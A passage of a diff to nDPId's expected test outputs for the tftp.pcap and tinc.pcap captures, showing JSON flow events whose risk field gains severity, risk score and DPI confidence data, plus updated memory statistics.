 01201{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626968644632,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYuhAAEARcqesHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"}
 01201{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1626968644632,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYulAAEARcqasHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"}
-00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","total-events-serialized":22}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 104/104
@@ -28,9 +28,9 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4601445 bytes
-~~ total memory freed........: 4601445 bytes
-~~ total allocations/frees...: 99666/99666
+~~ total memory allocated....: 4685414 bytes
+~~ total memory freed........: 4685414 bytes
+~~ total allocations/frees...: 101256/101256
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 1206 chars
diff --git a/test/results/tinc.pcap.out b/test/results/tinc.pcap.out
index 5bb75dedc..5f1d0de25 100644
--- a/test/results/tinc.pcap.out
+++ b/test/results/tinc.pcap.out
@@ -7,22 +7,22 @@
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01295{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1495983428000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":686,"pkt_l4_len":652,"ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAAKgAABAAEARePuDcqgbuVPacNln2WcCjOIVMnicz9ZajjNEbdb6GxVP+T0CYtKzdvwcc\/GkysPu2p+HyRNKFCh5wNXMj6m9vaZ39wOg\/SFDxkblUqiUmI5T0t6KnEjzK4HfVELTk6MBki+YvI91VjjOz3oekNHxmSbldeRnnKPd925mZ9lxMA3GG9gZmsCSn4wPwr41LS70gLZbanbUNnlN7x6Kh9gVM6JtlzGBIjbSf6B4epOKePy2xW4AQp4bPXtTf\/0OGkPuy5hSETaSFX43lK3JOI2urGuq\/8zhvAyKL4t3LDJwEcTmglCiHm1tbrVnkmBCUBidOZ0NL52X+MKzyHnGOwdAwfV4+3VKFFmQE8IO6WWoZ\/vYOzfj1XZjyXREui0IMCYkWnraOSjlBBxRPQ4DkdgtsHokBlbzUjfr8Ss8XpNaUoZaaRCYy8Kw3szJstqYEU2GPLD0+pg+X9RZcEt+NlU1dFprcf5TwwLwxVrUXlq0UN21vjPNjBpnc4JeghgRv\/VcYRefFyhIUgPMVrdpg5GrCB4JTq65maVpsTyfybYsJ+i42aA3YjBU5z0PIhvBUxoHrj9TxX5OiZvAe42wvflGvW6iHzGGkgjUXDRxjS28FvW05QZJMaG4nQLQu0v8AHNHzQKZciwh33gMV3VVc\/5ghMO+CpJHRRkAZ7mBJzHMFXodcVJsk6K\/2J54sUaiJ48wBzCUQaWI9+w9ancXV2nZd+EHodY95wdzarfbqW8B30M66dRT3RsX8ddjytNxLuW+ewDpuzxP\/dncf+l0Gbul3BZMq9q4XnRT0wDb7bXlR0N7oHMRyWJ2GHC0RV7IQnYGzB\/YDI0StaWXOcSFic4ZA5TwYmSAm0iGFMYJM8DJznOohvp1QzM="}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
 01357{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1495983428000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":734,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":734,"pkt_l4_len":700,"ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAALQAABAAEAReMuDcqgbuVPacNln2WcCvOcuvywVtuwFGBCYss6acsiJNNNiAbBIlKDNCK44gk8rPgtBTYPcB0TBQaeKKWA+4iZhbEKh+1udHAv6t2B1Yn6IJMtYq5DM3X4M272sdmCIguJEDbWnC1eertoAJ\/nCld7bT5YQq8t1ppSFEJgecf3feprazQpcAFso0UkuKa+f8uN2aRv39oQ84yMBNBDhwVJ0a0nVOlZ6yZDSD51mMG4JoLiN6RWJXjcVqxy8m9jXpG1c+xsS0O6vC2KUMrKi+v7l2G+JsqarL4sHxppbbBoKMn1G6jriIHVF2byGLSZ00B3htFsVVj1wv1QBh8gghmipFPjUm\/aeSaE+oJUPKU+sp7Dg6Xva6c8vbo3TtJqvjKV8ke6QyQ7aGh5wPiN9\/a7xgRazNtYiEGk2\/mB4tPUVqvmOMmFqyRUy5E54tmImaZBxLH6d0RcjOcdr5cOGQQBnbEVGuWb70eAFXbxU9GwFaLQbsB4ixO+0UXLmZZZSFjcwzL0p2ByLphsBC+0r5HUR+xSSVPlg1gpXDvLAqvPafPWGz0oEsVqgZuuOxAECfRwfFUitnotekdgFMlckueO6aNw3gcrUrWq8lluC226td1YzzuWc1bztMEO46Nwl29tlwW+n4BfE8Ks4iF0RmPeruypgNVfy8UHTu26YFArxZ++\/ysArMEP2WLqaUMI6M\/jOSF4Hmz4MDlNkXALZoCcota0mysF7b9UawKat33S4Mn95EjfrH9sP42bJhKBoemGSQoufnGy397VEaJIbjn0C4TMCdTSxnPB2Kbauhcj5J9SFESxhfdT1dCI+XOZyD+qGea1LaaQlTKnH9E\/\/jMJNmp50jvcNxKjRrVFwHpWvyCjkeewfQ5cMV0LYN7Zr0J8LPcmGWZ6HVdR8joEBR5VzTkpA484re9kkh3rmNHcG6eXJdcA="}
 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1495983428027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"ts_msec":1495983428027,"pkt":"ACbGCvpSABcILL3nCABFCADgAABAADERibO5U9pwg3KoG9ln2WcAzPGuM9Lx5\/tPdTG2m3Y0AlyEq2mnzqyIMEs7w8HRBEl8Y5NuT+Tl6VzNZm9syhOM8O5X9DMCZ2i18aEY5\/AFa+9vGaBzFiMm9BvXYzjoD8NIhl92KAV3hQzzPzdUGmBVVMf0BbRkDSRCiFN9nGpFLBN+y4nOpA3kBUeSofHjZl9gZY\/0gSr+qv0Gl1ZSJf+LLeeMJpEC6tb9XeO6w6224M34GMTZTkD7Nv+SCyj6hVz9obZb5coivi5CEA1BAiI84UNSuifu9w=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":180000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01401{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCALwAABAADERh6O5U9pwg3KoG9lo2WgC3AOYwHfE3coRkd9vFWAurZs8jstTwnXw\/cqsx5iKbKA7woGOpEZiStAKTCSRoKp6x6\/f9Zs+BpTFgPOcyy5YAMcbffaGjwWOnT8IyeKE5n34quupOTS2uuRjCtyNCFAo8WTnSMzbi32PyJcywIUxEUQ8liTYbPgKdwTgaiP\/Hotm1mtwLDTs7hG08UqSbcXCWXNFFVPEK47MaPqwoPn2dh7mqibglI+NUfYKog17NTDVZj+waYLvcDN9j2XoImkNzUjCipW9K3ac4j70R5PFggHU36XlCSNZ2XhIjFKM00nQGI+QLoteQ8j0aZAsrLXLYsxqqK4SvGoYgma1olbSPh2W15iEFnVNfCrkhO342UfUtRpoqO2eSyqwBMxkb1F3H2m0kYUJQotA5znx3A5M2I2cLV97Zq1M5s2yfOsVLnemh3YMo8DmxGOnynqe4PdTcIIYCFlTuvlbJxcoz46oqoG4DHCRlF0dlntPGix0TitI5D\/n0YiE5bQQUU7gqIMYrd\/038O+j7JziwNwLqI9ZUNuZRL5RgmChAbYY5TtTaE7r+CtYmugTK7qdhtdAytq+kIRcuZJxzW2e+QHOyzQjzCE7aIMnqFyw73cJLJvOafzGqDIWsdusVXsa7JkhE0L2HSLACJvLruZU6SO95zxggRtnzTruoO2bZQpKHl56KP7dWrprSH\/BtWoA8QYIMdKrZ11e6dVhhfntSzlJ7oOBRzS82PQtcxITPaQUBY7kloV6nEsD123\/RYWvYnnlopmrLjY88pZllsFaRoYa+q+rxj125r8cCXiXcb20crMWSrxvWF5gSaLraJg0iySCfa0N+9TIxFXdaISLPrnQJf+KFNsm71eDJSNCihlQD114v9gJdrqDDh2zOpIECten2AFkK5gz9Y9P\/m15B6u92mwRdXwhBzI10R26F6x1VA2OCcHHQ90EjxcfGr9C9BCt8qY+zJFJYvpTw=="}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":180000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":180000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
 02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAXAAABAADERhNO5U9pwg3KoG9lo2WgFrCCQQfVUKnrm4XUK3wfxxn8qlQ5ZlUxAsin94OmtvvCqeiNDv9hCgysXgIe\/Jwp6foEgyUgSLwbFE+jFX5EiTbzvLxw+eE+9kkIbIypcFMAA862am\/h5EhYX9oyZgZit\/ohLFdBZAd\/9piW+TIg1JYKUHUk24mSNhkzehqNGbaa8v1XNXvCAKUf+je80JL2ztiSjDNtOMrbTSNyuOyDQhbbpaRAakKCJ88rhmRVZWPpGUvSoCLUQLdy+ls4UP9VbLIv60yNlhG\/tIZF+Y9AgYJgNK7469NXCZUoHPgebmwGoSIBvEupGZ2HWMq5tD1YtSNLd5mdcZ4U6bdW57PJT8Mqpobu5nNKCEUTKU8fv54QllT27onCmdTrjSLU7i56qGCPKz8Pmgpd+4MU1sOXlteqk11G5kxvUePU9AHDMWVZcDsBw+8w6+Ab\/JxYo4ilYPsOkX7nL+VL0USjj5AuG8wFeeDnvZeQURQeN12MuZewRpRzkJa5jIqIQqHHvEIR3I+NlcYV0IJXsrpavQ6RSGtYmR7+94hoEShFxTK6D2mPtrdLiAqRfmJptPiSWLm5Mqo0iayfkgY6sd6M1vwIpwRPc0qQOtn1doDjup9IIauyzdANQF9x2voU4Z8dsvHyVyVE9VF\/Qdb\/Bbe15\/vrLpOF+cB00\/TXrJ07AVZHqEwel\/iScs2S9kgqiIjzb1T0G6y8xlHQV7ktrErMlC4GXnRqlxWayYa4G266nN6wc0wTy9MD7G5DpqxUPZwZIrxZiMHXc4mPXA210XTsNG7LVVQM581lStiGr1a4pUZOImjoO\/gk5frgMuu6jHFgEA+vJuy5sW5lQpb37IXQqFXKKxN2z8Ke+x4zy7ALHVigelzuNCf3HZfol1uD4eeP+2tpVITMiH4O5PCcLDMT1yYFhbvLg8pREkBITQB+rUBzFhHXEVteh6noPH6hIRkDIrLyfEHdswFs6MATwSlSxKkz0QuaSV8BEXCeHOM+JmmNRCgSmcHuzwrDdDGG7eSF7kzVOXV4KPQtBdbB4rq\/rFfGJFSiBXn2huFIeNdQhj4gFtDQIfYjXMsmhSsrScwjLj7C7jg2Rwm\/XuhfLgws3rBZC6s4ClAl8Lku7gDzAWOdYgK2FafJmEnZR3NXAFEI8JF5r5ITwwBATJADMcv7GO51VLOgFAuacu5w0kk1gxapzbHcSOdPeKJB+9voPecizTzqOKMuqIngnpb\/qfLXWqnLz7U6\/\/ui4aHgWF+lKp0xsjiPYD9YnVxFJE08oruybimAl5F4KHctwad6wrnqDh7AMDE3spgEO04z6pL2VZXL\/wvq6pxHL80kORMsGZgPOmyHtPCRE5Jd+RFgmwBejwRrNJFCuLc2P622GjZ1t\/hPuud14khvjnfHdyfKsl19iLyzwv7qu0oEoiwBrYf06g7MzcULZl4XUxJNSE9RYU15rJmRxguh4eXuIOqgIqrfkbI\/\/vDyBWYyc45utTloDIm+GnDiAeigtPF4FijLPE9qVDfQilPuHMnf6UDvllbgNqo19g3gnmLroqXep+7LyRYp4sWr4\/d\/TZKaC